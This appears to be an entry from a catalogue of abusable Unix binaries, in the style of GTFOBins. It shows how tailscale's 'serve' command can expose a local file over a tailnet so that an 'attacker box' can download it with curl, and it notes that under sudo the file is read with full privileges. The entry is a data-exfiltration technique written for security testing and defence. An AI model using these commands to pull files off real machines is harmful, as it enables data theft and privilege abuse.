tailscale

Upload

This executable can upload local data.
  1. CommentThe URL is reachable by any host of the same Tailnet.
    This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
    RemarksIf there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
    tailscale serve --http=12345 /path/to/input-file
    Receiver

    An HTTP client can be used on the attacker box to receive the data.

    The actual URL is returned by the command.

    curl http://<hostname>.<tailnet>.ts.net:12345/ -o /path/to/output-file